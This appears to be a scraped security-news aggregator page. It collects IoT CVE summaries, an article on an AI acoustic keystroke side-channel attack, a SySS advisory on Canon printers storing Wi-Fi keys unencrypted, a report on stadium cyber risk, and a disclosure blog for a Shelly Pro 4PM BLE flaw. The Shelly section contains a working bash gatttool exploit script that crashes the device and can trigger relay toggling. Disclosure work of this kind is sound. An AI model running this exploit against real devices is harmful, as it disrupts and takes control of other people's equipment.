TOTOLINK T10_v2 5.9c.5061_B20200511 has a stack-based buffer overflow in setWiFiWpsConfig in /lib/cste_modules/wps.so. Attackers can send crafted data in an MQTT packet, via the pin parameter, to control the return address and execute code.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-40041: IoT_vuln/TOTOLINK/T10_V2/lib-cste_modules-wps.md at main · Korey0sh1/IoT_vuln

Tenda AC7 V1.0,V15.03.06.44, F1203 V2.0.1.6, AC5 V1.0,V15.03.06.28, AC9 V3.0,V15.03.06.42_multi and FH1205 V2.0.0.7(775) were discovered to contain a stack overflow via the deviceId parameter in the addWifiMacFilter function.

CVE-2023-38930: IoT-Vulns/tenda/addWifiMacFilter/README.md at main · FirmRec/IoT-Vulns

Netgear XR300 v1.0.3.78 was discovered to contain multiple buffer overflows via the wla_ssid and wlg_ssid parameters at genie_ap_wifi_change.cgi.

CVE-2023-36499: IoT-Vulns/netgear/nvram_ssid/README.md at main · FirmRec/IoT-Vulns

Tenda F1203 V2.0.1.6, FH1203 V2.0.1.6 and FH1205 V2.0.0.7(775) were discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.

CVE-2023-38940: IoT-Vulns/tenda/form_fast_setting_wifi_set at main · FirmRec/IoT-Vulns

By Habiba Rashid
Revolutionary AI Model Predicts Keystrokes Through Sound: A New Wave of Acoustic Attacks.
This is a post from HackRead.com Read the original post: AI Model Listens to Typing, Potentially Compromising Sensitive Data

1.  **Cornell researchers unveil AI model decoding keyboard inputs from audio signals.**
2.  **New attack predicts keystrokes by analyzing acoustic signatures of different keys.**
3.  **Implications for data security and emergence of acoustic cyberattacks raise concerns.**
4.  **AI model achieves 93% accuracy, setting a new record for audio-based classification systems.**
5.  **Countermeasures like noise introduction can reduce accuracy, limiting widespread malicious use.**

Researchers at Cornell University have unveiled a groundbreaking deep-learning model capable of deciphering keyboard input solely from audio signals. This pioneering advancement, led by Joshua Harrison, Ehsan Toreini, and Maryam Mehrnezhad, has significant implications for data security and the emergence of acoustic cyberattacks.

In a recently published paper titled “A Practical Deep Learning-Based Acoustic Side Channel Attack on Keyboards,” the Cornell team introduced an Artificial intelligence (AI) model capable of accurately predicting keystrokes by analyzing the unique acoustic signatures produced by different keys on a keyboard.

The technique involves training the model to associate specific audio patterns with corresponding characters, allowing it to virtually ‘listen’ to typing and transcribe it with astonishing accuracy.

Traditional cyberattacks often exploit software vulnerabilities or rely on phishing tactics, but this new wave of attacks leverages the physical characteristics of keyboards, emphasizing the significance of sound as a potential security vulnerability. The implications are far-reaching, as this method could compromise user passwords, conversations, messages, and other sensitive information.

The team’s research indicates that the model achieves an impressive accuracy rate of 93% when trained using Zoom recordings, marking a new record for audio-based classification systems. The process of training the model involves exposing it to multiple instances of each keystroke on a specific keyboard. The researchers utilized a MacBook Pro, pressing each of its 36 keys 25 times to develop a comprehensive dataset for training.

Screenshot (Arxiv)

Despite its remarkable potential, the AI model does come with certain limitations and vulnerabilities. Changing typing styles or utilizing touch typing can significantly reduce the model’s accuracy, dropping it to a range of 40% to 64%. Additionally, countermeasures like introducing noise to the audio signal can obfuscate the keystrokes and diminish the model’s accuracy.

However, the researchers are clear that the model’s effectiveness is dependent on the specific keyboard’s sound profile. This dependence restricts the applicability of the attack to keyboards with similar acoustic characteristics, limiting its scope for widespread malicious use.

As the digital landscape evolves, the arms race between cyberattacks and defence measures continues to escalate. The development of AI-based acoustic side-channel attacks underscores the need for enhanced security measures, including innovative noise-cancellation solutions like NVIDIA’s RTX Broadcast, which can counteract these types of attacks.

For a comprehensive exploration of the Cornell team’s findings and methodologies, readers can refer to the official research paper (PDF) available for further study. As the boundaries of AI and cybersecurity continue to blur, understanding these advancements is crucial for individuals and organizations to stay ahead of potential threats.

**RELATED ARTICLES**

1.  AI-based Model to Predict Extreme Wildfire Danger
2.  Stealing data from air-gapped PC by turning RAM into Wi-Fi Card
3.  Locating malicious drone operators through deep neural networks
4.  Hackers Can Now Steal Data from Air-Gapped PCs via SATA Cables
5.  Malware can extract data from air-gapped PC through power supply

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

AI Model Listens to Typing, Potentially Compromising Sensitive Data

In wlan service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07460540; Issue ID: ALPS07460540.

CVE-2023-20818: August 2023

The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage (EEPROM). Resetting the product to factory settings does not securely delete this sensitive information. Versions 1.020 and 1.080 are affected.

Advisory ID:               SYSS-2023-011  
Product:                   PIXMA TR4550  
Manufacturer:              Canon  
Affected Version(s):       1.020 / 1.080  
                            also affects many other Canon inkjet printer  
                            models[4]  
Tested Version(s):         1.020 / 1.080  
Vulnerability Type:        Insufficient or Incomplete Data Removal  
                            within Hardware Component (CWE-1301)  
                            Insufficiently Protected Credentials  
                            (CWE-522)  
Risk Level:                Low  
Solution Status:           Fixed  
Manufacturer Notification: 2023-04-06  
Solution Date:             2023-07-31  
Public Disclosure:         2023-08-03  
CVE Reference:             No CVE ID from Canon PSIRT  
Author of Advisory:        Manuel Stotz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Canon PIXMA TR4550 is an entry-level 4-in-1 printer equipped with  
Wi-Fi connectivity.

The manufacturer describes the product as follows (see [1]):

"Ready to adapt to your smart home office environment, this efficient  
4-In-One printer requires minimal space but gives maximum support to  
your projects. Whether scanning a document, copying an ID, faxing an  
invoice or printing posters, PIXMA TR4550 has the functionality to keep  
up with your business needs. Equipped with smart Wi-Fi connectivity to  
optimise management of functions and features, this front-loading  
4-In-One printer is the compact solution that saves space, streamlines  
ink usage and brings productivity to the forefront."

The unprotected storage of credentials and insufficient data removal  
during a factory reset allows sensitive data to be read out afterward.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the  
Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage  
(EEPROM).

Resetting the product to factory settings (via 'Setup', 'Device  
settings', 'Reset setting' and 'All data') does not securely delete this  
sensitive information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS could successfully perform a proof-of-concept attack via the  
following steps:

* Configure and establish a Wi-Fi connection.  
* Reset all data (Setup, Device settings, Reset setting, All data).  
* Disassemble the printer and locate the EEPROM on the PCB.  
* Create an EEPROM memory dump.  
* Search and locate the configured SSID and PSK in the memory dump.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Canon PSIRT published its security advisory "Vulnerability  
Mitigation/Remediation for Inkjet Printers (Home and Office/Large  
Format)" (CP2023-003)[3] describing how sensitive information should be  
deleted concerning the affected printers[5].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2023-04-06: Vulnerability reported to manufacturer  
2023-04-12: Canon PSIRT creates ticket  
2023-04-27: Update from Canon concerning ongoing analysis  
2023-05-15: Canon confirms security issue  
2023-05-23: Agreement on public disclosure date  
2023-07-17: Canon PSIRT informs about scheduled publication of their  
             security advisory  
2023-07-31: Canon PSIRT publishes their security advisory "Vulnerability  
             Mitigation/Remediation Format Inkjet Printers (Home and  
             Office/Large Format)" (CP2023-003)[3]  
2023-08-03: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Canon PIXMA TR4550

 https://www.canon-europe.com/support/consumer/products/printers/pixma/tr-series/pixma-tr4550.html  
[2] SySS Security Advisory SYSS-2023-011

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-011.txt  
[3] CP2023-003 Vulnerability Mitigation/Remediation for Inkjet Printers   
(Home and Office/Large Format)  
     https://psirt.canon/advisory-information/cp2023-003/  
[4] List of affected printers

 https://canon.a.bigcontent.io/v1/static/affected-models_20230731_d04c0d9895124b65acd21ca68357dcdc  
[5] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc  
Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Canon PIXMA TR4550 1.020 / 1.080 Unencrypted Secret Storage

Microsoft is warning of the threat malicious cyber actors pose to stadium operations, warning that the cyber risk surface of live sporting events is "rapidly expanding."
"Information on athletic performance, competitive advantage, and personal information is a lucrative target," the company said in a Cyber Signals report shared with The Hacker News. "Sports teams, major league and global

Cyber Threat / Network Security

Microsoft is warning of the threat malicious cyber actors pose to stadium operations, warning that the cyber risk surface of live sporting events is "rapidly expanding."

"Information on athletic performance, competitive advantage, and personal information is a lucrative target," the company said in a Cyber Signals report shared with The Hacker News. "Sports teams, major league and global sporting associations, and entertainment venues house a trove of valuable information desirable to cybercriminals."

"Unfortunately, this information can be vulnerable at-scale, due to the number of connected devices and interconnected networks in these environments."

The company specifically singled out hospitals delivering critical support and health services for fans and players as being targets of ransomware attacks, resulting in service disruptions.

To defend against such attacks, Microsoft is recommending that -

*   Companies disable unnecessary ports and ensure proper network scanning for rogue or ad hoc wireless access points
*   Attendees secure apps and devices with latest updates and patches, avoid avoid accessing sensitive data over public Wi-Fi, and refrain from scanning QR codes from untrusted sources
*   Commerce systems ensure point-of-sale (PoS) devices are patched, up to date, and connected to a separate network, and
*   Stadium operations implement logical network segmentations to create divisions between IT and OT systems and limit cross-access to devices

"Ideally, organizations and security teams could configure their systems before the event to complete testing, snapshot the system and devices, and make them readily available to IT teams to rapidly redeploy when needed," Microsoft said.

"These efforts go a long way in deterring adversaries from taking advantage of poorly configured, ad hoc networks within the highly desirable, target rich environments of large sporting events."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Flags Growing Cybersecurity Concerns for Major Sporting Events

Shelly 4PM Pro four-channel smart switch 0.11.0 allows an attacker to trigger a BLE out of bounds read fault condition that results in a device reload.

**Authentication Bypass via an out-of-bounds read vulnerability**

**Introduction**

The Security Team at \[exploitsecurity.io\] uncovered a vulnerability in the Shelly 4PM Pro four-channel smart switch \[ Firmware Version 0.11.0\]. Under certain conditions the vulnerability allows an attacker to trigger an BLE out of bounds read fault condition that results in a device reload. It was found that this vulnerability could enable an attacker to switch on relays, if coupled with the systems scripting feature.

This blog looks to describe:

*   Affected Product Overview
    
*   The Shelly 4PM PRO under the hood
    
*   Attack Surface Mapping
    
*   Threat Modeling
    
*   Vulnerability Description
    
*   Responsible Disclosure
    
*   Proof of concept
    
*   Timeline
    

**Affected Product Overview**

The Shelly Pro 4PM is a DIN rail mountable four-channel smart switch with power measurement capabilities. Enhanced with all the gen2 firmware flexibility, LAN connectivity and color graphic display, it provides professional integrators with many more options for end customer solutions. It can work standalone in a local Wi-Fi network or it can also be operated through cloud home automation services. Shelly Pro 4PM can be accessed, controlled and monitored remotely from any place where the User has internet connectivity, as long as the device is connected to a Wi-Fi router and the Internet. Shelly Pro 4PM has an embedded Web Interface which can be used to monitor and control the device, as well as adjust its settings.

Product: Shelly PRO 4PM (GEN2)

Affected Firmware Version: 0.11.0

**Under the hood**

Under the hood the Shelly PRO 4PM runs on an ESP32-D0WDQ6 MCU. The device utilizes diverse technologies to help either control or communicate signals/traffic flows between the device and its respective management device. Under normal operating procedure the device uses RPC calls over HTTP in order to monitor and control the device through its associated mobile application. The device utilizes the RPC protocol for control and notifications. RPC messages can be sent using HTTP. In the event that authentication is enabled there is a requirement to include a nonce, cnounce and hashed response by the device being controlled. The hashed response is constructed using information from an initial RPC call that elicits a HTTP 401 response. This response contains randomized data that is used to instantiate the hashed response in a subsequent request. For more information relating to the RPC functionality visit - https://shelly-api-docs.shelly.cloud/gen2/General/Authentication

**Attack Surface Mapping**

The following attack surface map was determined:

Attack Surface Map

As can be seen the device is integrated into its environment using multiple distinct protocols including ModBus, HTTP, MQTT, RPC, WebSocket and UDP. All of which require access to either a physically connected ethernet or alternatively over RF/WiFi in order to interoperate.

As stated within the Product Overview \[above\], the device can be controlled either locally (within the host network) or alternatively remotely over the internet. The device is managed through the use of the associated Shelly Mobile Application. This application fulfills the function of monitoring of the device as well as control.

**Threat Modeling**

The predominate interaction with the device occurs using authenticated HTTP RPC calls. RPC is used to make the appropriate call for a specific function.

Using the above Attack Surface Mapping as a reference point, the Security Team at \[exploitsecurity.io\] considered multiple use cases in order to tease out weaknesses within the product. The following describes the hypothesis for each individual use case and the ultimate result in each case.

**WIFI and Physical Ethernet Vectors**

*   **Authentication bypass by capture replay (Authentication Enabled)** **_Use Case:_**
    

Although the Security Team noted that it was possible to replay unauthenticated control flows, the Security Team wanted to examine the possibility of capturing authenticated control packets and subsequently replaying these packets to gain control of the device.

**_Result:_**

These efforts were essentially thwarted through adequate randomized hashing mechanisms which included nonce, cnonce values and SHA256 encryption.

*   **Brute Forcing the authentication mechanism**
    

**_Use Case:_**

The Security Team found that it was possible to reverse the hashing algorthim. This algorithm incorporates the values username, password, realm, nonce, cnounce and a nc value. These values are then concatenated using ':' as a delimiter. A SHA256 hashing algorithm is then used to produce the resultant hash.

**_Result:_**

It was determined that due to the per request randomized values used to construct a correct hash that brute forcing was improbable.

**BLE Vector**

The Security Team turned their attention to the investigation of the BLE stack on the device. As far as could be determined the BLE functionality was currently ONLY used for device inclusion (Scanning/Importing of the device into the mobile application). Shelly devices are used as Bluetooth proxies to obtain data from devices which send data advertisements (notifications that do not require an active connection).

*   **Affecting the BT Stack to elicit an unknown system state**
    

**_Use Case:_**

Due to the use of an underlying ESP32 BT SoC, which are regularly found to harbor a known BLE vulnerability (https://asset-group.github.io/disclosures/braktooth/), it was posited that it may be possible to affect an unknown system state using this type of attack vector.

Prying further into how BLE may be used on earlier Shelly devices, it was uncovered that it may have been used to service formatted JSON RPC calls.

An overview of the RPC via BLE process is detailed below:

*   Under normal circumstances the device expects RPC JSON data (RPC calls use JSON format) to be written to BLE characteristic handle 0x0008.
    
*   The RPC calls noted here are the same as the ones previously mentioned above in this blog post.
    
*   In order to make ready the BLE stack to accept this data there is a requirement for the length of the required RPC JSON data to be written to BLE write handle 0x000d.
    
*   The data written at this location informs the characteristic read/write handle 0x0008 that it should expect 'x' amount of byte(s).
    
*   These bytes correspond to the length of the RPC JSON data.
    

**_Result:_**

Understanding the above RPC via BLE process the Security Team looked at possible ways to trigger the posited out-of-bounds read vulnerability.

The Security Team found that in order to produce a consistent fault condition, that it was possible to set an arbitrary length, through a write to BLE handle 0x000d followed by a subsequent write to read/write handle 0x0008.

The subsequent write to handle 0x0008, using a larger length of input data than was expected, would ultimately result in a device reset condition.

**Additional Feature**

As an additional feature the Shelly PRO 4PM allows for a scripting feature to be manually configured. This feature allows for automated tasks to be triggered upon certain events.

Example of such events may include

*   Toggling of relays
    
*   Monitoring of the status of the devices' cover.
    

**Chained Attack**

The Security Team found that by chaining the BLE fault condition together with the Shelly PRO scripting feature, that it was possible to coerce the device into execution of the pre-configured script which would ultimately result in the toggling of the on-board relay.

This behavior was noted as affecting the device configured with or without authentication enabled.

**Responsible Disclosure**

The Security Team at \[exploitsecurity.io\], reached out to the vendor to ensure that a patch was released prior to public disclosure. However, as of the time of this disclosure, no patch has been applied.

**Proof of Concept**

The proof of concept code wraps the GATTTOOL utility into a functional exploit.

#!/bin/bash

IFS\=
failed\=$false
RED\="\\e\[31m"
GREEN\="\\e\[92m"
WHITE\="\\e\[97m"
ENDCOLOR\="\\e\[0m"
substring\="Connection refused"

banner()
    {
        clear
        echo \-e "${GREEN}\[+\]\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\[+\]"
        echo \-e "${GREEN}|   Author : Security Team \[${RED}exploitsecurity.io${ENDCOLOR}\]              |"
        echo \-e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo \-e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo \-e "${GREEN}\[+\]\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\[+\]"
        echo \-e "${GREEN}\[Enter key to send payload\]${ENDCOLOR}"
    }

banner
read \-s \-n 1 key
if \[ "$key" \= "x" \]; then
    exit 0;
elif \[ "$key" \= "" \]; then
    gattout\=$(sudo timeout 5 gatttool \-b c8:f0:9e:88:92:3e \--primary)
    if \[ \-z "$gattout" \]; then
        echo \-e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x000d \-n 00000001 \>/dev/null 2\>&1
    echo \-ne "${GREEN}\[Sending Payload\]${ENDCOLOR}"
    sleep 1
    if \[ $? \-eq 1 \]; then
       $failed\=$true
       exit 0;
    fi
    sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x0008 \-n ab \>/dev/null 2\>&1
    sleep 1
    if \[ $? \-eq 1 \]; then
        $failed\=$true
        echo \-e "${RED}\[\*\*Exploit Failed\*\*\]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool \-b c8:f0:9e:88:92:3e \--char\-write\-req \-a 0x0008 \-n abcd \>/dev/null 2\>&1
       sleep 1
       for i in {1..5}
       do
          echo \-ne "${GREEN}."
          sleep 1
       done
       echo \-e "\\n${WHITE}\[Pwned!\]${ENDCOLOR}"
    fi
fi
fi

**Timeline**

1.  1st May 2023 - Reached out to vendor via https://support.shelly.cloud/en/support/tickets/new?ticket\_form=report\_an\_issue for initial report disclosure. Created a support ticket (https://support.shelly.cloud/en/support/tickets/36432).
    
2.  3rd May 2023 - Support Ticket removed from shelly support site
    
3.  3rd May 2023 - Reached out to support@shelly.cloud
    
4.  4th May 2023 - Received communications from support@shelly.cloud. Sent through proof of concept steps.
    
5.  9th May 2023 - Received email confirmation from support@shelly.cloud advising that weakness is being further examined by shelly developers
    
6.  9th May 2023 - Registered for CVE-2023-33383
    
7.  9th June 2023 - Received confirmation from vendor of issue replication
    
8.  29th May 2023 - CVE reference: CVE-2023-33383 assigned (MITRE)
    
9.  2nd August 2023 - Public Disclosure Published
    

_Please see Shelly change log for updates_ https://shelly-api-docs.shelly.cloud/gen2/changelog/

CVE-2023-33383: CVE-2023-33383

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

Tag

#wifi